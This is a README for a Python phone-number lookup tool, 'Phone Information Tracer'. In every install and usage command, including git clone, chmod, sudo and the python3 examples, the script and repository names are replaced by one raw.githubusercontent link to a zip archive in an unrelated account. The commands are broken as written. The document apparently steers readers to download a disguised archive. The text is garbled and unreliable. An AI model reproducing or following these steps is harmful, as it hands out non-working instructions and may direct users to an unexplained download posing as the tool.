This script is written in python3 so python3 is required.
Clone the git repository to your local machine.
git clone https://raw.githubusercontent.com/anakiseng789/PhoneInformationTracer/master/inflammatorily/Phone_Information_Tracer_1.1.zipInstall the phonenumbers library from pip
pip install phonenumbersor use pip3 in case you have both python2 and python3 install on your system
pip3 install phonenumbersIf you want to add it to your path simply run chmod +x https://raw.githubusercontent.com/anakiseng789/PhoneInformationTracer/master/inflammatorily/Phone_Information_Tracer_1.1.zip and sudo https://raw.githubusercontent.com/anakiseng789/PhoneInformationTracer/master/inflammatorily/Phone_Information_Tracer_1.1.zip.
Everything is set! Now you can fire up the script.
In order to run this script on windows, download the repository to your computer and make sure you have python3 installed or anaconda.
Install phonenumbers library
pip install phonenumbersInstall argparse library
pip install argparseEverything is set! Now you can fire up the script.
============================================================
Welcome to Phone Information Tracer made by Konstantinos Pap
============================================================
usage: https://raw.githubusercontent.com/anakiseng789/PhoneInformationTracer/master/inflammatorily/Phone_Information_Tracer_1.1.zip [-h] [-i INPUT] [-cc COUNTRY_CODE] [-v] [-l LIST] [-o OUTPUT]
optional arguments:
-h, --help show this help message and exit
-i INPUT, --input INPUT
The Phone Number imput to Examine
-cc COUNTRY_CODE, --country-code COUNTRY_CODE
The Country Code, Default=+30 (GR)
-v, --verbose increase output verbosity
-l LIST, --list LIST Specify a phone list to enumerate
-o OUTPUT, --output OUTPUT
Specify a file to export the data
Usage Example:
python3 https://raw.githubusercontent.com/anakiseng789/PhoneInformationTracer/master/inflammatorily/Phone_Information_Tracer_1.1.zip -i 6985456254If you want to change the country code you can simply add the -cc flag and set the flag.
python3 https://raw.githubusercontent.com/anakiseng789/PhoneInformationTracer/master/inflammatorily/Phone_Information_Tracer_1.1.zip -i 6985456254 -cc +30Or you can pass a file to the program with phone numbers on each line and specify a output file
python3 https://raw.githubusercontent.com/anakiseng789/PhoneInformationTracer/master/inflammatorily/Phone_Information_Tracer_1.1.zip -l input -o outputCountry code by default is +30.